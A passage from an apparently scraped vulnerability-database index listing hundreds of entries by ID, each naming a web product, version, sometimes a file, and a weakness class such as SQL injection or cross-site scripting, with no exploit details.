vulnerability [35340] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability [35339] Web-app.org WebAPP up to 0.9.9.4 information disclosure [35338] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability [35337] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability [35336] Web-app.org WebAPP up to 0.9.9.4 Default Configuration [35335] Web-app.org WebAPP 0.9.9.4 weak authentication [35334] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability [35333] Web-app.org WebAPP up to 0.9.9.4 unknown vulnerability [35332] Web-app.org WebAPP 0.9.9.4 cross site request forgery [35331] Web-app.org WebAPP 0.9.9.4 Profiles unknown vulnerability [35330] Web-app.org WebAPP 0.9.9.4 Administration Administrative unknown vulnerability [35329] Web-app.org WebAPP up to 0.9.9.4 cross site scripting [35328] Web-app.org WebAPP 0.9.9.4 Log Viewer cross site scripting [35327] Web-app.org WebAPP 0.9.9.4 cross site scripting [35326] Web-app.org WebAPP 0.9.9.4 cross site scripting [35317] webSPELL 4.0/4.01.00/4.01.01/4.01.02 printview.php sql injection [35314] webSPELL 4.0 weak authentication [35309] webSPELL File Upload privilege escalation [35308] webSPELL sql injection [35223] Phpwebgallery 1.6.1 register.php cross site scripting [35096] webSPELL 4.01.02 news.php sql injection [35014] Nickolas Grigoriadis Mini Web server 0.0.6 directory traversal [34986] cPanel WebHost Manager up to 11.0.0 cross site scripting [34960] Plain Old Webserver up to 0.0.8 directory traversal [34925] cPanel WebHost Manager privilege escalation [34820] Portail Web Php 2.5.1.1 index.php directory traversal [34819] Portail Web Php up to 2.5.1.0 includes/includes.php privilege escalation [34778] Intel Server Board Sc5400ra Intelligent Platform Management Interface denial of service [34702] SpoonLabs Vivvo Article Management CMS 3.40 rss/show_webfeed.php sql injection [34640] Grigoriadis Mini Web server up to 0.4 memory corruption [34619] webSPELL 4.01.02 gallery.php sql injection [34610] webSPELL 4.01.02 gallery.php sql injection [34603] Webchat.org WebChat 0.77 defines.php privilege escalation [34573] BEA WebLogic Portal 9.2 unknown vulnerability [34571] BEA WebLogic Server denial of service [34569] BEA WebLogic Server 9.0 denial of service [34568] BEA WebLogic Server up to 6.1 denial of service [34567] BEA WebLogic Server 9.0 information disclosure [34566] BEA WebLogic Server denial of service [34565] BEA WebLogic Server up to 7.0 unknown vulnerability [34564] BEA WebLogic Server up to 7.0 unknown vulnerability [34563] BEA WebLogic Server 9.0 unknown vulnerability [34562] BEA WebLogic Server up to 8.1 Access Restriction unknown vulnerability [34561] BEA WebLogic Server up to 6.1 denial of service [34559] BEA WebLogic Server up to 6.1 unknown vulnerability [34558] BEA WebLogic Server up to 8.1 unknown vulnerability [34557] BEA WebLogic Server up to 7.0 Thread Management denial of service [34445] Oracle E-Business Suite 11.5.10cu2 Web Applications Desktop Integrator unknown vulnerability [34419] Pensacola Web Designs Xtremeasp Photogallery 2.0 displaypic.asp sql injection [34418] Pensacola Web Designs Xtremeasp Photogallery 2.0 displaypic.asp cross site scripting [34356] magic photo storage website admin_password.php privilege escalation [34341] Scriptaty magic photo storage website privilege escalation [34259] Cms-center Simple Web Cms page.php sql injection [34173] Zen Cart Web Shopping Cart up to 1.3.6 cross site scripting [34160] AIDeX Mini-WebServer 1.1 Rc3 denial of service [34158] Mozilla Durian Web Application Server 3.02 memory corruption [34122] Microsoft Office Web Components 2000 privilege escalation [34113] Novell GroupWise 5.57e/6.5.7/7.0/7.0.0 WebAccess user.html cross site scripting [34043] Http explorer Http Explorer Web Server 1.02 directory traversal [33959] WebCalendar 1.0.4 export_handler.php cross site scripting [33866] Microsoft IIS 5.1 Web Directory com privilege escalation [33838] cPanel WebHost Manager 3.1.0 cross site scripting [33827] IBM WebSphere Host On-Demand 6.0 unknown vulnerability [33738] Xerox WorkCentre 12/13/14 Web Services information disclosure [33735] Xerox WorkCentre 12.060.17.000/13.060.17.000/14.060.17.000 User Interface privilege escalation [33536] cPanel WebHost Manager 3.1.0 cross site scripting [33509] Apple Mac OS X up to 10.3.x WebKit memory corruption [33464] IBM WebSphere Application Server Eal4 Authentication unknown vulnerability [33463] IBM WebSphere Application Server unknown vulnerability [33451] Biba Software SeleniumServer Web Server 1.0 cross site scripting [33351] SAP SAP Web Application Server up to 6.39 enserver.exe denial of service [33342] Webhost Automation Helm Web Hosting Control Panel 3.2.10 users.asp cross site scripting [33321] Web Inhabit A+ Store E-Commerce account_login.asp cross site scripting [33320] Web Inhabit A+ Store E-Commerce browse.asp sql injection [33226] Essen Essentia Web Server 2.15 memory corruption [33181] The Web Drivers Simple Forum message_details.php sql injection [33166] SAP SAP Web Application Server up to 6.39 enserver.exe denial of service [33109] EFS Web Server 4.0 NTFS File System ::$data information disclosure [33108] EFS Web Server 4.0 File Sharing cross site scripting [33057] Web Wiz Forums 8.04 sql injection [33020] Webgeneius GOOP Gallery index.php cross site scripting [33019] MiniHTTP Web Forum File Sharing Sever Powerpack 4.0 User Account join.asp privilege escalation [32933] Trawler Trawler Web CMS up to 1.8.1 index.php privilege escalation [32921] Castor PHP Web Builder 1.1.1 lib/rs.php privilege escalation [32893] Comdev Web Blogger 4.1 adminfoot.php privilege escalation [32842] WebSPELL 4.0/4.01.01 index.php sql injection [32781] IBM WebSphere Application Server up to 6.1.0.1 unknown vulnerability [32704] phpWebSite 0.10.2 init.php privilege escalation [32647] webGENEius GOOP Gallery 2.0.2 download.php directory traversal [32640] Joshua Muheim phpMyWebmin 1.0 change_preferences2.php privilege escalation [32627] PHP Web Scripts Easy Banner Free functions.php privilege escalation [32591] Joshua Muheim phpMyWebmin 1.0 window.php opendir information disclosure [32590] Joshua Muheim phpMyWebmin 1.0 window.php privilege escalation [32580] InterVations NaviCOPA Web Server 2.01 memory corruption [32540] Jl Webworks QuickBlogger 1.4 acc.php privilege escalation [32337] Roller WebLogger 2.3 sitesearch.do cross site scripting [32283] WebSPELL 4.0/4.01.01 squads.php sql injection [32282] WebSPELL 4.0/4.01.01/4.1/4.1.1 Stored information disclosure [32265] IBM Lotus Domino Web Access 7.0.1 unknown vulnerability [32248] Comscripts Web Server Creator 0.1 privilege escalation [32225] raidenhttpd 1.1.32/1.1.47/1.1.49 WebAdmin privilege escalation [32178] EFS Easy Address Book Web Server 1.2 denial of service [32011] PHPBB 2.0.20 Web Proxy usercp_avatar.php privilege escalation [31921] Sun Java Web Start up to 1.3.0_02 privilege escalation [31871] WTcom Web Torrent up to 0.2.4 torrents.php sql injection [31861] Symantec Veritas NetBackup PureDisk Remote Office Edition Management Interface unknown vulnerability [31857] IBM WebSphere Application Server up to 6.0.2.12 ThreadIdentitySupport unknown vulnerability [31853] WEBsta CMS 0.3.1 privilege escalation [31845] WEBsta Mailing List Manager 1.3e install3.php privilege escalation [31841] WebDynamite ProjectButler 0.8.4 Cache classes privilege escalation [31837] Soft3304 04WebServer 1.5/1.42/1.81/1.83 User Authentication unknown vulnerability [31836] Soft3304 04WebServer 1.5/1.42/1.81/1.83 Error Page cross site scripting [31833] WEBsta CMS 0.3.1 index.php privilege escalation [31816] TinyWebGallery 1.3/1.4/1.5 image.php privilege escalation [31796] IBM WebSphere Application Server up to 6.1.0.0 information disclosure [31790] Webring Component up to 1.0 on Joomla admin.webring.docs.php privilege escalation [31760] Webligo BlogHoster 2.2 previewcomment.php cross site scripting [31750] Novell GroupWise WebAccess up to 6.4 Login Page cross site scripting [31730] Web-scripts Visual Events Calendar 1.1 calendar.php privilege escalation [31722] Turnkey Web Tools PHP Simple Shop up to 2.0 admin/index.php privilege escalation [31721] Turnkey Web Tools PHP Live Helper up to 2.0 global.php privilege escalation [31635] CA eTrust Antivirus WebScan up to 1.1.0.1047 memory corruption [31634] CA eTrust Antivirus WebScan up to 1.1.0.1047 memory corruption [31633] CA eTrust Antivirus WebScan memory corruption [31594] Total Online Solutions Advanced Webhost Billing System 2.2.2 contact.php cross site scripting [31395] Silentweb listmessenger 0.9.3 listmessenger.php privilege escalation [31314] Hotwebscripts CMS Mundo 1.0 Search Module index.php sql injection [31301] Hitachi Groupmax Collaboration Web Client File Sharing cross site scripting [31297] Drupal 4.6/4.7 Webform Module cross site scripting [31218] PhpWebGallery up to 1.6 comments.php cross site scripting [31200] Webex Communications Downloader Java ActiveX Control privilege escalation [31033] Mambo 4.6 weblinks.php sql injection [31032] Mambo 4.6 weblinks.php sql injection [31005] IBM WebSphere Application Server up to 6.0.2.10 UserNameToken Cache unknown vulnerability [30962] Php Web Scripts Ad Manager Pro 2.6 common.php privilege escalation [30899] Hotwebscripts CMS Mundo unknown vulnerability [30898] Hotwebscripts CMS Mundo sql injection [30856] Webexceluk P.A.I.D 2.2 Input Fields index.php cross site scripting [30827] Pensacola Web Designs Xtreme ASP Photo Gallery up to 1.05 displaypic.asp cross site scripting [30785] WebprojectDB 0.1.3 nav.php privilege escalation [30752] It-direkt Cabacos Web CMS up to 3.8.498 suchergebnisse.asp cross site scripting [30637] HotWebScripts Weblog Oggi 1.0 hotwebscripts.com cross site scripting [30624] ASPwebSoft Speedy Asp Discussion Forum profileupdate.asp unknown vulnerability [30581] WebCalendar 1.0.3 index.php includedir privilege escalation [30575] Eitsop My Web Server 1.0 denial of service [30504] Agtc Websolutions PHP-AGTC Membership System up to 1.1a adduser.php cross site scripting [30501] Hotwebscripts CMS Mundo 1.0 Search Module cross site scripting [30307] BEA WebLogic Server up to 8.1 information disclosure [30306] BEA WebLogic Server 9.0 Administration Console unknown vulnerability [30305] BEA WebLogic Server 9.0 weak encryption [30304] BEA WebLogic Server 8.1 Administration Console information disclosure [30303] BEA WebLogic Server 8.1 Administration Console unknown vulnerability [30302] BEA WebLogic Server 8.1 unknown vulnerability [30298] BEA WebLogic Server up to 8.0 unknown vulnerability [30287] IBM WebSphere Application Server 5.0.2 weak encryption [30286] IBM WebSphere Application Server up to 5.0.2 unknown vulnerability [30285] IBM WebSphere Application Server 5.1.1 Trace information disclosure [30284] IBM WebSphere Application Server 5.0.2 unknown vulnerability [30283] IBM WebSphere Application Server up to 5.0.2 cross site scripting [30282] IBM WebSphere Application Server up to 5.0.2 weak encryption [30248] Turnkey Web Tools PHP Live Helper 1.8 chat.php cross site scripting [30237] Limbo CMS 1.0.4.2 weblinks.html.php sql injection [30232] Web-Labs Web-Labs CMS cross site scripting [30103] Northern Solutions Xeneo Web Server 2.2.22.0 privilege escalation [30102] WebCalendar 1.0.1/1.0.2/1.0.3 Error Message unknown vulnerability [30084] OpenVPN up to 2.0.7 Management Interface weak encryption [29994] Blog Mod 0.2.x weblog_posting.php sql injection [29985] Jmk Web Scripts Jmk Picture Gallery admin_gallery.php3 unknown vulnerability [29982] SWS Sws Simple Web Server 0.1.7 syslog memory corruption [29981] SWS Sws Simple Web Server 0.1.7 memory corruption [29916] PhpWebGallery 1.0/1.4.1/1.5.1 picture.php privilege escalation [29837] Cisco ASA 9.1.2/9.1.4 WebVPN privilege escalation [29836] Symantec Web Gateway up to 5.2.1 Report Reflected cross site scripting [29835] Symantec Web Gateway up to 5.2.1 clientreport.php sql injection [29834] Symantec Web Gateway up to 5.2.1 User.php sql injection [29833] Symantec Web Gateway up to 5.2.1 SNMPConfig.php privilege escalation [29812] Cisco Wireless LAN Solution Engine up to 2.12 User Interface archiveapplydisplay.jsp cross site scripting [29696] phpWebSite 0.10.2 index.php loadconfig directory traversal [29681] TinyWebGallery 1.3/1.4 index.php cross site scripting [29669] Jl Webworks QuickBlogger 1.4 acc.php cross site scripting [29553] PHPWebGallery 1.4.1 category.php cross site scripting [29552] PHPWebGallery 1.4.1 search.php cross site scripting [29500] IBM WebSphere Application Server up to 4.0.1 denial of service [29483] PhpWebGallery 1.4.1 category.php sql injection [29420] WebCalendar 1.1.0 Error Message groups.php information disclosure [29390] Desiderata Software Blazix Web Server up to 1.2.5 privilege escalation [29385] Turnkey Web Tools PHP Live Helper 1.8 initiate.php Stored directory traversal [29384] Turnkey Web Tools PHP Live Helper 1.8 initiate.php privilege escalation [29375] Web-app.org WebAPP up to 0.9.9.3.2 index.cgi cross site scripting [29370] Jjwwebdesign Phpbookingcalendar 1.0c details_view.php sql injection [29355] Webhost Automation Helm Web Hosting Control Panel up to 3.2.10 domains.asp cross site scripting [29334] Pablo Software Solutions Baby ASP Web Server up to 3.1.0 privilege escalation [29330] IBM Tivoli Business Systems Manager up to 3.1.0.0 Web Console apwc_win_main.jsp cross site scripting [29318] Benson It Solutions 1WebCalendar 4.0 viewevent.cfm sql injection [29297] BEA WebLogic Server up to 8.1 denial of service [29277] phpWebsite 0.7.3/0.8.2/0.8.3 friend.php sql injection [29152] Efs Software Efs Web Server 3.2 File Sharing memory corruption [29151] Efs Software Efs Web Server 3.2 File Sharing cross site scripting [29150] Efs Software Efs Web Server 3.2 File Sharing memory corruption [29132] Solido Systems Ravenous Web Server up to 0.7.0 unknown vulnerability [29081] IBM WebSphere Application Server up to 5.0.2.10 information disclosure [29016] UKiWeb UKiBoard 3.0.1 fce.php show_post cross site scripting [29011] NetworkActiv NetworkActiv Web Server 3.5.15 information disclosure [28972] phpWebSite up to 0.10.2 topics.php sql injection [28852] Leif M. Wright Web Blog 3.5 ViewCommentsLog Stored cross site scripting [28851] Leif M. Wright Web Blog 3.5 privilege escalation [28850] Leif M. Wright Web Blog 3.5 Blog.CGI unknown vulnerability [28849] Leif M. Wright Web Blog 3.5 unknown vulnerability [28846] Mantis up to 1.00rc4 Web Access manage_user_page.php sql injection [28842] MitriDAT Web Calendar Pro dropbase.php sql injection [28799] PerlBlog 1.08/1.09/1.09b weblog.pl memory corruption [28798] PerlBlog 1.08/1.09/1.09b weblog.pl directory traversal [28797] PerlBlog 1.08/1.09/1.09b weblog.pl cross site scripting [28780] cPanel dowebmailforward.cgi cross site scripting [28754] webSPELL 4.01.00 search.php sql injection [28689] IBM Lotus Domino iNotes Client 6.5.4 Domino Web Access cross site scripting [28571] cPanel webmailaging.cgi cross site scripting [28483] BEA WebLogic Server up to 9.0 Connection Filter denial of service [28481] BEA WebLogic Portal up to 8.1 Web Services unknown vulnerability [28479] BEA WebLogic Server up to 8.1 weak encryption [28478] BEA WebLogic Portal up to 8.1 Deployment unknown vulnerability [28477] BEA WebLogic Server up to 8.1 unknown vulnerability [28476] BEA WebLogic Server up to 8.1 denial of service [28475] BEA WebLogic Server up to 9.0 denial of service [28303] PayPal PHP Toolkit 0.50 Web Services ipn_success.php unknown vulnerability [28284] Webwiz Web Wiz Forums 6.34 search_form.asp cross site scripting [28280] OrjinWeb E-Commerce index.php memory corruption [28245] TheWebForum 1.2.1 login.php sql injection [28244] TheWebForum 1.2.1 register.php cross site scripting [28180] VEGO Web Forum up to 1.26 functions.php sql injection [28137] IBM WebSphere Application Server up to 5.0.2.5 information disclosure [28136] IBM WebSphere Application Server 6.0 information disclosure [28111] Sun Java System Web Proxy Server up to 3.6 denial of service [28101] phpWebSite up to 0.10.1 index.php sql injection [28094] Jl Webworks QuickBlogger 1.4 cross site scripting [28076] BEA WebLogic Server up to 8.1 Password Authentication username/password unknown vulnerability [28075] BEA WebLogic Server up to 8.1 unknown vulnerability [28074] BEA WebLogic Server up to 8.1 Administration Server unknown vulnerability [28073] BEA WebLogic Server 9.0 denial of service [28072] BEA WebLogic Server up to 8.1 Stored unknown vulnerability [28069] BEA WebLogic Server up to 8.1 unknown vulnerability [28068] BEA WebLogic Server 8.1 unknown vulnerability [28067] BEA WebLogic Server up to 8.1 Administration Server unknown vulnerability [28066] BEA WebLogic Server up to 8.1 unknown vulnerability [28065] BEA WebLogic Server up to 8.1 unknown vulnerability [28063] BEA WebLogic Server up to 8.1 Network Address Translation information disclosure [28062] BEA WebLogic Server up to 8.1 unknown vulnerability [28060] BEA WebLogic Server up to 9.0 cross site scripting [28059] BEA WebLogic Server up to 8.1 denial of service [28057] WebHost Automation up to 3.2.5 cross site scripting [28020] BEA WebLogic Server up to 8.1 unknown vulnerability [28019] BEA WebLogic Server up to 8.1 weak encryption [27902] BlueCoat Webproxy 4.0/5.0/5.1/5.2/6.0 Web Console memory corruption [27889] Bluecoat Webproxy 4.0/5.0/5.1/5.2/6.0 memory corruption [27878] VMware ESX Server up to 2.5.2 Management Interface cross site scripting [27654] IBM WebSphere Application Server login.jsp cross site scripting [27571] Hitachi Groupmax Collaboration Web Client up to 07 00 06-10-/b denial of service [27570] Hitachi Groupmax Collaboration Web Client up to 07 00 06-10-/b cross site scripting [27538] MarmaraWeb MarmaraWeb E-commerce index.php cross site scripting [27537] MarmaraWeb MarmaraWeb E-commerce index.php memory corruption [27481] Php Web Scripts Ad Manager Pro up to 2.0 advertiser_statistic.php sql injection [27479] Php Web Scripts Link Up Gold up to 2.5 tell_friend.php cross site scripting [27478] Php Web Scripts Link Up Gold up to 2.5 poll.php sql injection [27476] PhpWebGallery up to 1.7.2 comments.php sql injection [27468] Netgear RP114 3.26 Interfaces memory corruption [27294] PHP Web Statistik 1.4 pixel.php denial of service [27293] PHP Web Statistik 1.4 stat.php denial of service [27292] PHP Web Statistik 1.4 stat.cfg information disclosure [27291] PHP Web Statistik 1.4 stat.php cross site scripting [27263] WebCalendar 1.0.1 edit_report_handler.php sql injection [27261] WebCalendar 1.0.1 layers_toggle.php sql injection [27240] WebCalendar 1.0.1 export_handler.php sql injection [27228] WebCalendar 1.0.1 activity_log.php sql injection [27186] Webmin 1.1.60/1.2.40 Login Form miniserv.pl denial of service [27133] Oliver May Athena PHP Website Administration 0.1a athena.php privilege escalation [27037] IBM WebSphere Application Server 5.0 memory corruption [27008] Revize CMS setwebspace.jsp cross site scripting [26988] Litespeed Technologies LiteSpeed Web Server 2.1.5 admin/config/confmgr.php cross site scripting [26928] SAP SAP Web Application Server 6.10 cross site scripting [26927] SAP SAP Web Application Server up to 6.10 fameset.htm cross site scripting [26926] SAP SAP Web Application Server up to 6.10 frameset.htm unknown vulnerability [26842] IBM WebSphere Application Server up to 6.x information disclosure [26819] Hasbani Web Server 2.0 denial of service [26715] Dr. Web Antivirus 4.32b unknown vulnerability [26572] Dr.Web Antivirus unknown vulnerability [26346] IBM Rational ClearQuest up to 2002.05.00 Web Client cross site scripting [26171] Foojan PHP Weblog Error Message daylinks/index.php information disclosure [26170] Foojan PHP Weblog index.php cross site scripting [26163] WebCalendar 1.0.0 settings.php privilege escalation [25937] NetworkActiv NetworkActiv Web Server 1.0 cross site scripting [25853] Php.warpedweb.net PHPPageProtect 1.0.0a admin.php cross site scripting [25841] WebCalendar up to 1.0.0 assistant_edit.php information disclosure [25755] Bdc Enterprises Web Wiz Forums 7.9 unknown vulnerability [25654] Sun ONE web server 6.1 Application Firewall cross site scripting [25652] BEA WebLogic Server 8.1 Application Firewall cross site scripting [25651] IBM WebSphere Application Server 5.1 Application Firewall cross site scripting [25596] Symantec Veritas Backup Exec up to 9.0 RPC Interface beserver.exe memory corruption [25562] Yaws Webserver up to 1.55 information disclosure [25538] osCommerce 2.1/2.2 Cvs/2.2 Ms1/2.2 Ms2 Web Cache index.php weak authentication [25406] Newmad Technologies PicoWebServer 1.0 memory corruption [25343] Ipswitch Imail 8.2 Hotfix 2/8.13 Web Calendar jsp directory traversal [25339] BEA WebLogic Server 6.1 memory corruption [25338] BEA WebLogic Server up to 8.1 denial of service [25337] BEA WebLogic Server up to 8.1 Administration Console loginform.jsp cross site scripting [25336] BEA WebLogic Server up to 7.0 denial of service [25334] BEA WebLogic Server up to 7.0 cross site scripting [25333] BEA WebLogic Server up to 8.1 Security Provider cross site scripting [25270] Jeuce Jeuce Personal Web Server 2.13 denial of service [25269] Jeuce Jeuce Personal Web Server 2.13 directory traversal [25268] Jeuce Jeuce Personal Web Server 2.13 Personal WebServer memory corruption [25253] Fastream Netfile Ftp Web Server 7.4.6 Installation denial of service [25233] Web-app.org WebAPP 0.9.9/0.9.9.2/0.9.9.2.1 apage.cgi privilege escalation [25178] WowBB Web Forum 1.6 view_user.php sql injection [25039] Soft3304 04WebServer 1.81 Installation directory traversal [25010] Oracle Application Server Web Cache WebCache cross site scripting [24965] Horde IMP up to 3.2.7 Rc1 Webmail Client cross site scripting [24903] Francisco Burzi PHP-Nuke 7.5/7.6 Web Cache modules.php weak authentication [24900] Webmin up to 1.1.40 Configuration File privilege escalation [24898] PMSoftware Simple Web Server 1.0 memory corruption [24822] Microsoft Outlook 2003 Outlook Web Access weak authentication [24806] Active Web Softwares Active Auction House 7.1 account.asp cross site scripting [24780] Francisco Burzi PHP-Nuke 7.6 Web_Links cross site scripting [24778] Francisco Burzi PHP-Nuke 7.6 Web_Links information disclosure [24777] Francisco Burzi PHP-Nuke 7.6 Web_Links search sql injection [24727] Web-app.org WebAPP 0.9.9/0.9.9.1/0.9.9.2 subs.pl privilege escalation [24651] PHP-Post Web Forum up to 0.32 cross site scripting [24650] PHP-Post Web Forum 0.22 weak authentication [24519] Cupidsystems CIS WebServer 3.5.13 directory traversal [24517] phpWebSite up to 0.10.0 Error Message index.php information disclosure [24511] phpWebSite up to 0.10.0 gif.php information disclosure [24455] Gentoo Webmin 1.140/1.150/1.160/1.170 unknown vulnerability [24413] Savant Savant Webserver 3.1 memory corruption [24411] EMotion MediaPartner Web Server 5.0 cross site scripting [24410] EMotion MediaPartner Web Server 5.0 directory traversal [24385] eMotion MediaPartner Web Server 5.0 information disclosure [24237] MySQL MaxDB 7.5.00.23/7.5.00.25 WebDAV getifheader memory corruption [24227] MySQL MaxDB up to 7.5.00.23 WebDAV wdvhandler_commonutils.c getlocktokenheader memory corruption [24145] Active Web Softwares Active Auction House 7.1 default.asp sql injection [24128] WebCalendar 0.9.45 user.php user_valid_crypt sql injection [23851] Novell GroupWise 6.0/6.5 WebAccess information disclosure [23611] Pensacola Web Designs Xtremeasp Photogallery 2.0 Login adminlogin.asp sql injection [23600] Novell NetWare 6.5 WebAdmin webadmin-apache.conf weak authentication [23599] Webwiz Web Wiz Forums 7.7a pop_up_ip_blocking.asp privilege escalation [23535] Soft3304 04WebServer 1.41 denial of service [23534] Soft3304 04WebServer 1.40 information disclosure [23520] Free Web Chat 2.0 usermanager.java adduser denial of service [23495] Pegasi Web Server 0.2.2 cross site scripting [23494] Pegasi Web Server 0.2.2 directory traversal [23395] Codeworx Technologies DCP-Portal up to 5.3.2 Web Cache calendar.php weak authentication [23387] Inweb Mail Server 2.40 SMTP Service denial of service [23365] National Science Foundation Squid Web Proxy Cache 2.3.stable5 privilege escalation [23364] Jetty HTTP Server up to 4.2.3 Web Services directory traversal [23313] IPSwitch IMail up to 8.1 Web Calendar calendar denial of service [23312] IPSwitch IMail up to 8.1 Web Messaging denial of service [23292] IPSwitch IMail Express up to 8.4 Web Messaging memory corruption [23273] Twilight Utilities Web Server 2.0.0.0 postfile.exe directory traversal [23270] Twilight Utilities Web Server 2.0.0.0 postfile.exe memory corruption [23264] IBM Lotus Domino 6.5.1 WebAdmin directory traversal [23251] Fizmez Web Server 1.0 denial of service [23242] Leif M. Wright Web Blog 1.1 blog.cgi privilege escalation [23241] Minihttpserver.net Forum Web Server up to 1.6 post1.htm cross site scripting [23223] Vizer Web Server 1.9.1 denial of service [23219] DotNetNuke 1.0.6/1.0.7/1.0.8/1.0.9/1.0.10d Configuration File web.config information disclosure [23218] phpWebSite up to 0.9.3.1 sql injection [23215] Mbedthis AppWeb HTTP Server up to 1.0 information disclosure [23214] Mbedthis AppWeb HTTP Server up to 1.0.1 denial of service [23213] Mbedthis AppWeb HTTP Server up to 1.0.1 denial of service [23159] Netwin Surgeldap up to 1.0g Administration Interface admin.cgi unknown vulnerability [23125] Mbedthis AppWeb HTTP Server up to 1.1.2 Access Restriction unknown vulnerability [23124] Mbedthis AppWeb HTTP Server up to 1.1.2 information disclosure [23121] Express-Web Content Management System default.asp cross site scripting [23103] Turbotraffictrader Php 1.0 ttt-webmaster.php cross site scripting [23093] WowBB Web Forum 1.61 view_user.php sql injection [23092] WowBB Web Forum 1.61 view_user.php cross site scripting [23090] DevoyBB Web Forum 1.0.0 sql injection [23089] DevoyBB Web Forum 1.0.0 cross site scripting [23051] Allwebscripts Mysqlguest awsguest.php cross site scripting [23045] Borland Web Server For Corel Paradox up to 1.0b3 directory traversal [22998] Conceptronic Cadslr1 Adsl Router 3.04n HTTP Administration Interface denial of service [22947] Aborior Encore Web Forum display.cgi privilege escalation [22911] Chat Anywhere up to 2.72 Administration Web Page unknown vulnerability [22910] PWebServer Web Server 0.3.3 directory traversal [22838] MyWebServer 1.0.3 admin information disclosure [22837] MyWebServer 1.0.3 denial of service [22833] Full Revolution aspWebCalendar 4.5 Login Page calendar.asp sql injection [22799] phpWebSite up to 0.9.3.4 index.php cross site scripting [22797] Soft3304 04webserver 1.42 Webserver denial of service [22796] Soft3304 04webserver 1.42 Webserver weak authentication [22795] Soft3304 04webserver 1.42 Error Page response_default.html cross site scripting [22793] Webcalendar view_entry.php unknown vulnerability [22792] Webcalendar Error Message validate.php information disclosure [22791] Webcalendar up to 0.9.44 init.php unknown vulnerability [22790] Webcalendar up to 0.9.44 login.php cross site scripting [22789] Webcalendar up to 0.9.44 view_entry.php cross site scripting [22782] Webhost Automation Helm Control Panel up to 3.1.19 cross site scripting [22781] Webhost Automation Helm Control Panel up to 3.1.19 sql injection [22779] Minihttpserver.net Web Forums Server 1.6 directory traversal [22757] Webmin up to 1.1.50 privilege escalation [22706] Singapore Image Gallery Web Application 0.9.10 cross site scripting [22705] Gallery Image Gallery Web Application 0.9.10 admin.class.php unknown vulnerability [22704] Singapore Image Gallery Web Application 0.9.10 thumb.php directory traversal [22482] Gweb HTTP Server 0.6 URL directory traversal [22467] Dell OpenManage Web Server 3.4.0 HTTP POST memory corruption [22351] Sun Java System Web Proxy Server up to 3.6 SP4 Connection Request memory corruption [22349] Hawking Technology HAR11A DSL Router Management Interface information disclosure [22319] Icecast Web Server up to 1.3.12 list.cgi cross site scripting [22188] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.3/0.9.3.4 Comments Module/Notes Module cross site scripting [22187] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.3/0.9.3.4 Calendar Module sql injection [22164] Web-app.org WebAPP 0.9.9 directory traversal [68444] Cisco ASA 9.1(1.170) WebVPN DOM cross site scripting [68442] Symantec Web Gateway up to 5.2.1 privilege escalation [68424] IBM WebSphere DataPower XC10 2.1/2.5 Java SDK memory corruption [68423] IBM WebSphere DataPower XC10 2.1/2.5 Java SDK unknown vulnerability [68422] IBM WebSphere DataPower XC10 2.1/2.5 cross site request forgery [68421] IBM WebSphere DataPower XC10 2.1/2.5 information disclosure [68420] IBM WebSphere DataPower XC10 2.1/2.5 cross site scripting [68419] IBM WebSphere DataPower XC10 2.1/2.5 cross site scripting [68417] Microsoft Exchange 2013 Outlook Web Access privilege escalation [68416] Microsoft Exchange 2007/2010/2013 Outlook Web Access privilege escalation [68415] Digium Asterisk 11.x/12.x/13.x WebSocket memory corruption [68278] Dell SonicWall GMS Virtual Appliance 7.2 GMS ViewPoint Web Application privilege escalation [68232] Apple Mac OS X 10.9.5 WebKit denial of service [68231] Apple Mac OS X 10.9.5 Web Cache information disclosure [68210] Trend Micro Interscan Web Security Virtual Appliance 5.1/5.5/5.6/6.0 privilege escalation [68157] SAP Network Interface Router 40.4 SAProuter Numeric Error [68054] Pidgin up to 2.10.9 User Interface libpurple memory corruption [67918] Oracle 7.0/8.0/8.1/8.2/8.3 Web Access commons-beanutils-1.8.0.jar privilege escalation [67882] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0/12.1.3.0 WLS Console unknown vulnerability [67873] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0/12.1.3.0 WLS-Console commons-beanutils-1.8.0.jar privilege escalation [67872] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0/12.1.3.0 WebLogic Tuxedo Connector unknown vulnerability [67728] Cisco WebEx Meetings Server 2.5 Password information disclosure [67715] Cisco WebEx Meetings Server 2.5.0.4 ClientUpgrade Servlet privilege escalation [67538] Juniper Junos Pulse SSL VPN Web Server cross site scripting [67537] Juniper Junos Pulse SSL VPN/UAC Web Server cross site scripting [67526] Cisco IOS XR 5.0.1.CE/5.2.1.CE Command Line Interface information disclosure [67448] McAfee Web Gateway up to 7.4.1 Accounts Tab Password information disclosure [67423] Cisco IOS 15.1(4)M3 on 1800 ISDN Basic Rate Interface denial of service [67406] Barracuda Web Security Flex 4.1 cross site scripting [67405] Barracuda Web Security Flex 4.1 cross site scripting [67403] Fabrice Bellard QEMU ACPI PCI Hotplug Interface memory corruption [67385] Cisco Webex MeetMeNow Server directory traversal [67277] IBM WebSphere Portal 6.1/7.0/8.0/8.5.0 Redirect [67276] IBM WebSphere Portal 6.1/7.0/8.0/8.5.0 Error Code Host information disclosure [67275] IBM WebSphere Portal 6.1/7.0/8.0/8.5.0 cross site scripting [67274] IBM WebSphere Portal 6.1/7.0/8.0/8.5.0 cross site scripting [67272] Barracuda Web Application Firewall 7.8.1.013 Token weak authentication [67255] Cisco WebEx Meetings Server 1.5(.1.131) Stack Trace information disclosure [67254] Cisco WebEx Meetings Server 1.5(.1.131) checkJS.jsp cross site request forgery [67253] Cisco WebEx Meetings Server 1.5 information disclosure [67252] Cisco WebEx Meetings Server 1.5 user.php weak encryption [67251] Cisco WebEx Meetings Server 1.5 Message OutlookAction User information disclosure [67250] Cisco TelePresence 4.0(2.8) Management Interface cross site scripting [67210] Tenable Nessus 5.2.3/5.2.4/5.2.5/5.2.6/5.2.7 Web UI 2.3.4 information disclosure [67173] Juniper Junos 11.4/12.1x44/12.1x45/12.1x46/12.1x47 WebAuth Login cross site scripting [67167] Citrix Netscaler Gateway up to 9.3-62.4/10.1-126.12 Administration User Interface cross site scripting [67152] Oracle Secure Global Desktop 4.63/4.71/5.0/5.1 Workspace Web Application 